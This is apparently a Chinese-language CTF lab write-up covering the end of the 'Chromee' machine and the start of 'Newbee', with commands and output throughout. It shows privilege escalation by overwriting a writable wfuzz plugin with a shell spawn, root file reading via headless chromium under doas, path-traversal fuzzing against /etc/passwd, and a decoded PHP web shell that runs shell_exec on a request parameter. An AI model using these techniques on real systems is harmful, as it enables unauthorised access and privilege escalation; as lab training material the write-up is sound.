cat.gif[4] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[5] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[6] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[7] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[8] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.002
cat.gif[9] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.000u 0:00.002
cat.gif[10] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.000u 0:00.002
cat.gif[11] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.000u 0:00.002
cat.gif[12] GIF 640x640 640x640+0+0 8-bit sRGB 256c 3.33064MiB 0.000u 0:00.002
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# identify -format "%s %T \n" cat.gif
0 65
1 98
2 65
3 100
4 102
5 98
6 67
7 6
8 6
9 6
10 6
11 6
12 6
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# identify -format "%T " cat.gif
65 98 65 100 102 98 67 6 6 6 6 6 6
这里我们只要时间间隔,看到这里就能想到是ascll码了,接下来把他们转换过来,再根据前面的note.txt提示47,猜测是rot47,得到密码p3p573r,但是这个密码其实是follower他自己的,从之前得到的conf文件中得到的提示permit follower as softly cmd /usr/local/bin/wfuzz可以看出来,接下来就是去找这个wfuzz文件的位置并找到是否有可以写入的文件
follower@Chromee:~$ cat /usr/local/bin/wfuzz
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from wfuzz.wfuzz import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
follower@Chromee:~$ find / -name wfuzz 2>/dev/null
/usr/local/bin/wfuzz
/usr/local/lib/python3.9/dist-packages/wfuzz
follower@Chromee:~$ /usr/local/lib/python3.9/dist-packages/wfuzz
-bash: /usr/local/lib/python3.9/dist-packages/wfuzz: Es un directorio
follower@Chromee:~$ cd /usr/local/lib/python3.9/dist-packages/wfuzz
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ ls -al
total 204
drwxr-xr-x 10 root root 4096 mar 7 10:57 .
drwxr-xr-x 6 root root 4096 mar 7 10:57 ..
-rw-r--r-- 1 root root 38827 mar 7 10:57 advanced.rst
-rw-r--r-- 1 root root 722 mar 7 10:57 api.py
-rw-r--r-- 1 root root 4251 mar 7 10:57 core.py
-rw-r--r-- 1 root root 4718 mar 7 10:57 dictionaries.py
-rw-r--r-- 1 root root 820 mar 7 10:57 exception.py
drwxr-xr-x 6 root root 4096 mar 7 10:57 externals
-rw-r--r-- 1 root root 3285 mar 7 10:57 facade.py
drwxr-xr-x 3 root root 4096 mar 7 10:57 factories
drwxr-xr-x 3 root root 4096 mar 7 10:57 filters
-rw-r--r-- 1 root root 11996 mar 7 10:57 fuzzobjects.py
-rw-r--r-- 1 root root 14220 mar 7 10:57 fuzzqueues.py
-rw-r--r-- 1 root root 11147 mar 7 10:57 fuzzrequest.py
drwxr-xr-x 3 root root 4096 mar 7 10:57 helpers
-rw-r--r-- 1 root root 1667 mar 7 10:57 __init__.py
-rw-r--r-- 1 root root 32 mar 7 10:57 __main__.py
-rw-r--r-- 1 root root 1481 mar 7 10:57 mixins.py
-rw-r--r-- 1 root root 8028 mar 7 10:57 myhttp.py
-rw-r--r-- 1 root root 9891 mar 7 10:57 myqueues.py
-rw-r--r-- 1 root root 12920 mar 7 10:57 options.py
drwxr-xr-x 3 root root 4096 mar 7 10:57 plugin_api
drwxr-xr-x 8 root root 4096 mar 7 10:57 plugins
drwxr-xr-x 2 root root 4096 mar 7 10:57 __pycache__
drwxr-xr-x 5 root root 4096 mar 7 10:57 ui
-rw-r--r-- 1 root root 6755 mar 7 10:57 wfuzz.py
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find . -writeable
find: predicado desconocido `-writeable'
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find . -writable
./plugins/payloads/file.py
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")
找到这个file.py是可以写入的,这里是作者忘记删掉了,我们也可以重写写入,然后使用doas这个工具运行命令,doas这个工具是可以指定其他用户来执行命令,这里指定的是softly这个用户
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ echo 'import os;os.system("/bin/bash")' > ./plugins/payloads/file.py
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import os;os.system("/bin/bash")
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cd ~
follower@Chromee:~$ doas -u softly /usr/local/bin/wfuzz -w /etc/passwd -u .
Password:
/usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@Chromee:/home/follower$
这样我们就拿到了softly用户的shell,然后就可以拿下user flag了
softly@Chromee:/home/follower$ cd ..
softly@Chromee:/home$ cd ..
softly@Chromee:/$ ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
softly@Chromee:/$ cd home
softly@Chromee:/home$ ls
follower softly
softly@Chromee:/home$ cd softly
softly@Chromee:~$ ls
user.txt
softly@Chromee:~$ cat user.txt
flag{c5dbe81aac6438c522d2f79cc7255e6a}
提权-root flag
先拿个pspy64过来看一下有没有定时任务
softly@Chromee:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/03/28 16:36:41 CMD: UID=0 PID=9 |
2025/03/28 16:36:41 CMD: UID=0 PID=8 |
2025/03/28 16:36:41 CMD: UID=0 PID=66 |
2025/03/28 16:36:41 CMD: UID=0 PID=65 |
2025/03/28 16:36:41 CMD: UID=0 PID=62 |
2025/03/28 16:36:41 CMD: UID=0 PID=6 |
2025/03/28 16:36:41 CMD: UID=1000 PID=587 | /usr/sbin/apache2 -k start
2025/03/28 16:36:41 CMD: UID=1000 PID=586 | /usr/sbin/apache2 -k start
2025/03/28 16:36:41 CMD: UID=1001 PID=5205 | ./pspy64
2025/03/28 16:36:41 CMD: UID=0 PID=5202 |
2025/03/28 16:36:41 CMD: UID=0 PID=52 |
2025/03/28 16:36:41 CMD: UID=0 PID=5158 |
2025/03/28 16:36:41 CMD: UID=0 PID=5157 |
2025/03/28 16:36:41 CMD: UID=0 PID=5109 |
2025/03/28 16:36:41 CMD: UID=0 PID=51 |
2025/03/28 16:36:41 CMD: UID=0 PID=5033 |
2025/03/28 16:36:41 CMD: UID=1000 PID=500 | php-fpm: pool www
2025/03/28 16:36:41 CMD: UID=0 PID=50 |
2025/03/28 16:36:41 CMD: UID=1000 PID=499 | php-fpm: pool www
2025/03/28 16:36:41 CMD: UID=1000 PID=496 | nginx: worker process
2025/03/28 16:36:41 CMD: UID=0 PID=494 | nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
2025/03/28 16:36:41 CMD: UID=0 PID=49 |
2025/03/28 16:36:41 CMD: UID=0 PID=4820 |
2025/03/28 16:36:41 CMD: UID=1001 PID=4804 | /bin/bash
2025/03/28 16:36:41 CMD: UID=1001 PID=4803 | sh -c /bin/bash
2025/03/28 16:36:41 CMD: UID=1001 PID=4802 | /usr/bin/python3 /usr/local/bin/wfuzz -w /etc/passwd -u .
2025/03/28 16:36:41 CMD: UID=0 PID=48 |
2025/03/28 16:36:41 CMD: UID=0 PID=47 |
2025/03/28 16:36:41 CMD: UID=0 PID=46 |
2025/03/28 16:36:41 CMD: UID=0 PID=4527 |
2025/03/28 16:36:41 CMD: UID=0 PID=45 |
2025/03/28 16:36:41 CMD: UID=0 PID=44 |
2025/03/28 16:36:41 CMD: UID=0 PID=43 |
2025/03/28 16:36:41 CMD: UID=0 PID=429 | /usr/sbin/apache2 -k start
2025/03/28 16:36:41 CMD: UID=0 PID=407 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2025/03/28 16:36:41 CMD: UID=0 PID=4 |
2025/03/28 16:36:41 CMD: UID=1000 PID=3757 | -bash
2025/03/28 16:36:41 CMD: UID=1000 PID=3756 | sshd: follower@pts/0
2025/03/28 16:36:41 CMD: UID=1000 PID=3739 | (sd-pam)
2025/03/28 16:36:41 CMD: UID=1000 PID=3738 | /lib/systemd/systemd --user
2025/03/28 16:36:41 CMD: UID=0 PID=3735 | sshd: follower [priv]
2025/03/28 16:36:41 CMD: UID=0 PID=368 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2025/03/28 16:36:41 CMD: UID=0 PID=360 | /usr/sbin/vsftpd /etc/vsftpd.conf
2025/03/28 16:36:41 CMD: UID=0 PID=340 | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
2025/03/28 16:36:41 CMD: UID=0 PID=302 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2025/03/28 16:36:41 CMD: UID=0 PID=3 |
2025/03/28 16:36:41 CMD: UID=0 PID=298 | /lib/systemd/systemd-logind
2025/03/28 16:36:41 CMD: UID=0 PID=296 | /usr/sbin/rsyslogd -n -iNONE
2025/03/28 16:36:41 CMD: UID=0 PID=288 |
2025/03/28 16:36:41 CMD: UID=0 PID=286 |
2025/03/28 16:36:41 CMD: UID=0 PID=282 |
2025/03/28 16:36:41 CMD: UID=0 PID=278 |
2025/03/28 16:36:41 CMD: UID=103 PID=274 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2025/03/28 16:36:41 CMD: UID=0 PID=273 | /usr/sbin/cron -f
2025/03/28 16:36:41 CMD: UID=0 PID=272 |
2025/03/28 16:36:41 CMD: UID=0 PID=269 |
2025/03/28 16:36:41 CMD: UID=0 PID=265 |
2025/03/28 16:36:41 CMD: UID=0 PID=261 |
2025/03/28 16:36:41 CMD: UID=0 PID=257 |
2025/03/28 16:36:41 CMD: UID=0 PID=252 |
2025/03/28 16:36:41 CMD: UID=0 PID=25 |
2025/03/28 16:36:41 CMD: UID=0 PID=244 |
2025/03/28 16:36:41 CMD: UID=0 PID=24 |
2025/03/28 16:36:41 CMD: UID=0 PID=23 |
2025/03/28 16:36:41 CMD: UID=104 PID=228 | /lib/systemd/systemd-timesyncd
2025/03/28 16:36:41 CMD: UID=0 PID=22 |
2025/03/28 16:36:41 CMD: UID=0 PID=21 |
2025/03/28 16:36:41 CMD: UID=0 PID=207 | /lib/systemd/systemd-udevd
2025/03/28 16:36:41 CMD: UID=0 PID=20 |
2025/03/28 16:36:41 CMD: UID=0 PID=2 |
2025/03/28 16:36:41 CMD: UID=0 PID=19 |
2025/03/28 16:36:41 CMD: UID=0 PID=182 | /lib/systemd/systemd-journald
2025/03/28 16:36:41 CMD: UID=0 PID=18 |
2025/03/28 16:36:41 CMD: UID=0 PID=17 |
2025/03/28 16:36:41 CMD: UID=0 PID=15 |
2025/03/28 16:36:41 CMD: UID=0 PID=148 |
2025/03/28 16:36:41 CMD: UID=0 PID=147 |
2025/03/28 16:36:41 CMD: UID=0 PID=13 |
2025/03/28 16:36:41 CMD: UID=0 PID=12 |
2025/03/28 16:36:41 CMD: UID=0 PID=110 |
2025/03/28 16:36:41 CMD: UID=0 PID=11 |
2025/03/28 16:36:41 CMD: UID=0 PID=109 |
2025/03/28 16:36:41 CMD: UID=0 PID=108 |
2025/03/28 16:36:41 CMD: UID=0 PID=107 |
2025/03/28 16:36:41 CMD: UID=0 PID=106 |
2025/03/28 16:36:41 CMD: UID=0 PID=105 |
2025/03/28 16:36:41 CMD: UID=0 PID=100 |
2025/03/28 16:36:41 CMD: UID=0 PID=10 |
2025/03/28 16:36:41 CMD: UID=0 PID=1 | /sbin/init
2025/03/28 16:37:01 CMD: UID=0 PID=5212 | /usr/sbin/CRON -f
2025/03/28 16:37:01 CMD: UID=0 PID=5213 | /usr/sbin/CRON -f
2025/03/28 16:37:01 CMD: UID=0 PID=5214 | /bin/sh -c /root/script.sh
2025/03/28 16:37:01 CMD: UID=0 PID=5215 | /bin/bash /root/script.sh
发现有一个/root/script.sh的定时任务,前面得到的一个提示有一个permit nopass :softly as root cmd /usr/bin/chromium这个工具,就是一个浏览器,但是靶机没有图形化界面,只能用无头模式的命令去请求或者找个端口转发的工具把端口转发出去,由于socat这个工具一直没调好,所以我选择使用无头模式进行任意文件读取,但是直接读/root/script.sh读不了,读了一下/root目录,发现有一个script.js,尝试去读这个文件
softly@Chromee:~$ doas -u root /usr/bin/chromium -headless --no-sandbox --disable-gpu --dump-dom file:///root/scripts.sh
[0328/164332.647180:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head></head><body></body></html>
softly@Chromee:~$ doas -u root /usr/bin/chromium -headless --no-sandbox --disable-gpu --dump-dom file:///root/
[0328/164339.741300:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head><script>start("/root/");</script>
<script>onHasParentDirectory();</script>
<script>addRow(".cache",".cache",1,4096,"4.0 kB",1741352446,"3/7/25, 2:00:46 PM");</script>
<script>addRow(".config",".config",1,4096,"4.0 kB",1741352227,"3/7/25, 1:57:07 PM");</script>
<script>addRow(".gnupg",".gnupg",1,4096,"4.0 kB",1741342463,"3/7/25, 11:14:23 AM");</script>
<script>addRow(".local",".local",1,4096,"4.0 kB",1673787535,"1/15/23, 1:58:55 PM");</script>
<script>addRow(".npm",".npm",1,4096,"4.0 kB",1741353605,"3/7/25, 2:20:05 PM");</script>
<script>addRow(".ssh",".ssh",1,4096,"4.0 kB",1741311069,"3/7/25, 2:31:09 AM");</script>
<script>addRow("node_modules","node_modules",1,4096,"4.0 kB",1741361623,"3/7/25, 4:33:43 PM");</script>
<script>addRow(".bash_history",".bash_history",0,0,"0 B",1743160930,"3/28/25, 12:22:10 PM");</script>
<script>addRow(".bashrc",".bashrc",0,3526,"3.4 kB",1673789490,"1/15/23, 2:31:30 PM");</script>
<script>addRow(".lesshst",".lesshst",0,33,"33 B",1741310850,"3/7/25, 2:27:30 AM");</script>
<script>addRow(".profile",".profile",0,161,"161 B",1562666750,"7/9/19, 12:05:50 PM");</script>
<script>addRow(".python_history",".python_history",0,12,"12 B",1741341445,"3/7/25, 10:57:25 AM");</script>
<script>addRow(".selected_editor",".selected_editor",0,66,"66 B",1741311649,"3/7/25, 2:40:49 AM");</script>
<script>addRow("package-lock.json","package-lock.json",0,2383,"2.3 kB",1741361623,"3/7/25, 4:33:43 PM");</script>
<script>addRow("package.json","package.json",0,69,"69 B",1741361623,"3/7/25, 4:33:43 PM");</script>
<script>addRow("root.txt","root.txt",0,39,"39 B",1741348914,"3/7/25, 1:01:54 PM");</script>
<script>addRow("script.js","script.js",0,1208,"1.2 kB",1741363600,"3/7/25, 5:06:40 PM");</script>
<script>addRow("script.sh","script.sh",0,38,"38 B",1741363755,"3/7/25, 5:09:15 PM");</script>
</head><body></body></html>
softly@Chromee:~$ doas -u root /usr/bin/chromium -headless --no-sandbox --disable-gpu --dump-dom file:///root/script.js
[0328/164348.249361:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">const CDP = require('chrome-remote-interface');
async function sendPostRequest() {
const client = await CDP();
const { Network, Page, Runtime } = client;
try {
// 启用网络调试
await Network.enable();
// 启用页面调试
await Page.enable();
// 访问页面
await Page.navigate({ url: 'http://127.0.0.1:80' });
await Page.loadEventFired(); // 等待页面加载完成
console.log('Page loaded. Sending POST request...');
// 在浏览器环境中执行 fetch 发送 POST 请求
const postData = JSON.stringify({ key: 'UGhhbnRvbSBFbmdhZ2UK' });
const script = `
fetch('http://127.0.0.1/post.php', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: '${postData}'
}).then(res => res.text()).then(console.log).catch(console.error);
`;
// 通过 Runtime.evaluate 在浏览器里执行 JavaScript 代码
await Runtime.evaluate({ expression: script });
} catch (err) {
console.error('Error:', err);
} finally {
client.close();
}
}
sendPostRequest();
</pre></body></html>
然后就拿到root 的密码了,密码是UGhhbnRvbSBFbmdhZ2UK
softly@Chromee:~$ su - root
Password:
root@Chromee:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@Chromee:~# ls -al
total 76
drwx------ 9 root root 4096 mar 7 17:09 .
drwxr-xr-x 18 root root 4096 mar 7 10:41 ..
lrwxrwxrwx 1 root root 9 abr 23 2023 .bash_history -> /dev/null
-rw------- 1 root root 3526 ene 15 2023 .bashrc
drwxr-xr-x 4 root root 4096 mar 7 14:00 .cache
drwxr-xr-x 4 root root 4096 mar 7 13:57 .config
drwx------ 3 root root 4096 mar 7 11:14 .gnupg
-rw------- 1 root root 33 mar 7 02:27 .lesshst
drw------- 3 root root 4096 ene 15 2023 .local
drwxr-xr-x 6 root root 4096 mar 7 16:33 node_modules
drwxr-xr-x 4 root root 4096 mar 7 14:20 .npm
-rw-r--r-- 1 root root 69 mar 7 16:33 package.json
-rw-r--r-- 1 root root 2383 mar 7 16:33 package-lock.json
-rw------- 1 root root 161 jul 9 2019 .profile
-rw------- 1 root root 12 mar 7 10:57 .python_history
-r-------- 1 root root 39 mar 7 13:01 root.txt
-rw-r--r-- 1 root root 1208 mar 7 17:06 script.js
-rwxr-xr-x 1 root root 38 mar 7 17:09 script.sh
-rw-r--r-- 1 root root 66 mar 7 02:40 .selected_editor
drw-r--r-- 2 root root 4096 mar 7 02:31 .ssh
root@Chromee:~# cat root.txt
flag{e96f7a29ba633b4e43214b43d1791074}
Newbee
信息搜集
mac地址为00:0C:29:15:F1:A2得到ip地址为192.168.1.102
┌──(root㉿kali-plus)-[/]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.1.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 3c:06:a7:fa:49:88 TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.100 e0:2e:0b:94:50:57 Intel Corporate
192.168.1.102 00:0c:29:15:f1:a2 VMware, Inc.
192.168.1.103 60:e3:2b:ab:61:39 Intel Corporate
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 4 responded
┌──(root㉿kali-plus)-[/]
└─# nmap 192.168.1.102 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-29 00:09 CST
Nmap scan report for bogon (192.168.1.102)
Host is up (0.00064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:15:F1:A2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds
使用gobuster对目录进行扫描
┌──(root㉿kali-plus)-[/]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.102/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.102/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 18852]
/contact.php (Status: 200) [Size: 8853]
/about.php (Status: 200) [Size: 10036]
/blog.php (Status: 200) [Size: 9782]
/products.php (Status: 200) [Size: 12163]
/terms.php (Status: 200) [Size: 6670]
/assets (Status: 301) [Size: 315] [--> http://192.168.1.102/assets/]
/testimonials.php (Status: 200) [Size: 7907]
/javascript (Status: 301) [Size: 319] [--> http://192.168.1.102/javascript/]
/checkout.php (Status: 200) [Size: 13307]
/secret.php (Status: 200) [Size: 2187]
/.php (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
user flag
发现/secret.php可以执行命令,但是权限不够,再从其他路子找入口,用wfuzz模糊测试一下是否可以任意文件读取
┌──(root㉿kali-plus)-[/]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.1.102/?FUZZ=../../../../../../etc/passwd --hh 18851
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.102/?FUZZ=../../../../../../etc/passwd
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002049: 200 376 L 1270 W 18863 Ch "hack"
Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0
发现是可以读取的,但是直接读好像读不了,试试php伪协议
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJ6aC1DTiI+DQo8aGVhZD4NCiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT7lkb3ku6TooYzmjqfliLblj7A8L3RpdGxlPg0KICAgIDxzdHlsZT4NCiAgICAgICAgYm9keSB7DQogICAgICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjMWUxZTFlOw0KICAgICAgICAgICAgZm9udC1mYW1pbHk6IENvbnNvbGFzLCBtb25vc3BhY2U7DQogICAgICAgICAgICBjb2xvcjogI2ZmZjsNCiAgICAgICAgICAgIG1hcmdpbjogMDsNCiAgICAgICAgICAgIHBhZGRpbmc6IDA7DQogICAgICAgIH0NCg0KICAgICAgICAuY29uc29sZSB7DQogICAgICAgICAgICB3aWR0aDogODAlOw0KICAgICAgICAgICAgbWFyZ2luOiA1MHB4IGF1dG87DQogICAgICAgICAgICBwYWRkaW5nOiAyMHB4Ow0KICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDsNCiAgICAgICAgICAgIGJvcmRlci1yYWRpdXM6IDhweDsNCiAgICAgICAgICAgIGJveC1zaGFkb3c6IDAgNHB4IDEwcHggcmdiYSgwLCAwLCAwLCAwLjUpOw0KICAgICAgICAgICAgaGVpZ2h0OiA0MDBweDsNCiAgICAgICAgICAgIG92ZXJmbG93LXk6IGF1dG87DQogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7DQogICAgICAgIH0NCg0KICAgICAgICAub3V0cHV0IHsNCiAgICAgICAgICAgIHdoaXRlLXNwYWNlOiBwcmUtd3JhcDsNCiAgICAgICAgICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIHsNCiAgICAgICAgICAgIGRpc3BsYXk6IGZsZXg7DQogICAgICAgICAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgICAgICB9DQoNCiAgICAgICAgLmlucHV0LWNvbnRhaW5lciAucHJvbXB0IHsNCiAgICAgICAgICAgIGNvbG9yOiAjMDBmZjAwOw0KICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiA1cHg7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0IHsNCiAgICAgICAgICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50Ow0KICAgICAgICAgICAgYm9yZGVyOiBub25lOw0KICAgICAgICAgICAgY29sb3I6ICNmZmY7DQogICAgICAgICAgICB3aWR0aDogMTAwJTsNCiAgICAgICAgICAgIHBhZGRpbmc6IDVweDsNCiAgICAgICAgICAgIGZvbnQtc2l6ZTogMTZweDsNCiAgICAgICAgICAgIG91dGxpbmU6IG5vbmU7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0OmZvY3VzIHsNCiAgICAgICAgICAgIGJvcmRlcjogMXB4IHNvbGlkICMwMGZmMDA7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0OjpwbGFjZWhvbGRlciB7DQogICAgICAgICAgICBjb2xvcjogIzg4ODsNCiAgICAgICAgfQ0KDQogICAgICAgIC5jb25zb2xlLWZvb3RlciB7DQogICAgICAgICAgICBwYWRkaW5nLXRvcDogMTBweDsNCiAgICAgICAgICAgIGNvbG9yOiAjODg4Ow0KICAgICAgICAgICAgZm9udC1zaXplOiAxMnB4Ow0KICAgICAgICAgICAgdGV4dC1hbGlnbjogY2VudGVyOw0KICAgICAgICB9DQogICAgPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KDQo8ZGl2IGNsYXNzPSJjb25zb2xlIj4NCiAgICA8ZGl2IGNsYXNzPSJvdXRwdXQiIGlkPSJvdXRwdXQiPg0KICAgICAgICA8P3BocA0KDQogICAgICAgIGlmIChpc3NldCgkX0NPT0tJRVsnQXJlWW91QWRtaW4nXSkgJiYgJF9DT09LSUVbJ0FyZVlvdUFkbWluJ10gPT09ICdZZXMnKSB7DQoNCiAgICAgICAgICAgIGlmIChpc3NldCgkX0dFVFsnY29tbWFuZCddKSkgew0KICAgICAgICAgICAgICAgICRjb21tYW5kID0gJF9HRVRbJ2NvbW1hbmQnXTsNCiAgICAgICAgICAgICAgICAkb3V0cHV0ID0gc2hlbGxfZXhlYygkY29tbWFuZCk7DQogICAgICAgICAgICAgICAgZWNobyAnPGRpdj5cPiAnIC4gaHRtbHNwZWNpYWxjaGFycygkY29tbWFuZCkgLiAnPC9kaXY+JzsNCiAgICAgICAgICAgICAgICBlY2hvICc8ZGl2PicgLiBubDJicihodG1sc3BlY2lhbGNoYXJzKCRvdXRwdXQpKSAuICc8L2Rpdj4nOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgZWNobyAnPGRpdj5ObyBwZXJtaXNzaW9uIHRvIGV4ZWN1dGUgY29tbWFuZHMsIGxhY2tpbmcgYWRtaW4gcGVybWlzc2lvbi48L2Rpdj4nOw0KICAgICAgICB9DQogICAgICAgID8+DQogICAgPC9kaXY+DQoNCiAgICA8ZGl2IGNsYXNzPSJpbnB1dC1jb250YWluZXIiPg0KICAgICAgICA8c3BhbiBjbGFzcz0icHJvbXB0Ij5cPjwvc3Bhbj4NCiAgICAgICAgPGZvcm0gbWV0aG9kPSJnZXQiPg0KICAgICAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIGlkPSJpbnB1dCIgcGxhY2Vob2xkZXI9ImNvbW1hbmQuLi4iIGF1dG9jb21wbGV0ZT0ib2ZmIj4NCiAgICAgICAgPC9mb3JtPg0KICAgIDwvZGl2Pg0KPC9kaXY+DQoNCjxzY3JpcHQ+DQogICAgY29uc3QgaW5wdXRGaWVsZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpbnB1dCIpOw0KDQogICAgaW5wdXRGaWVsZC5mb2N1cygpOw0KPC9zY3JpcHQ+DQoNCjwvYm9keT4NCjwvaHRtbD4NCg==
成功读取到了secret.php的内容,给他解密一下
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>命令行控制台</title>
<style>
body {
background-color: #1e1e1e;
font-family: Consolas, monospace;
color: #fff;
margin: 0;
padding: 0;
}
.console {
width: 80%;
margin: 50px auto;
padding: 20px;
background-color: #000;
border-radius: 8px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.5);
height: 400px;
overflow-y: auto;
font-size: 16px;
}
.output {
white-space: pre-wrap;
margin-bottom: 10px;
}
.input-container {
display: flex;
align-items: center;
}
.input-container .prompt {
color: #00ff00;
margin-right: 5px;
}
.input-container input {
background: transparent;
border: none;
color: #fff;
width: 100%;
padding: 5px;
font-size: 16px;
outline: none;
}
.input-container input:focus {
border: 1px solid #00ff00;
}
.input-container input::placeholder {
color: #888;
}
.console-footer {
padding-top: 10px;
color: #888;
font-size: 12px;
text-align: center;
}
</style>
</head>
<body>
<div class="console">
<div class="output" id="output">
<?php
if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {
if (isset($_GET['command'])) {
$command = $_GET['command'];
$output = shell_exec($command);
echo '<div>\> ' . htmlspecialchars($command) . '</div>';
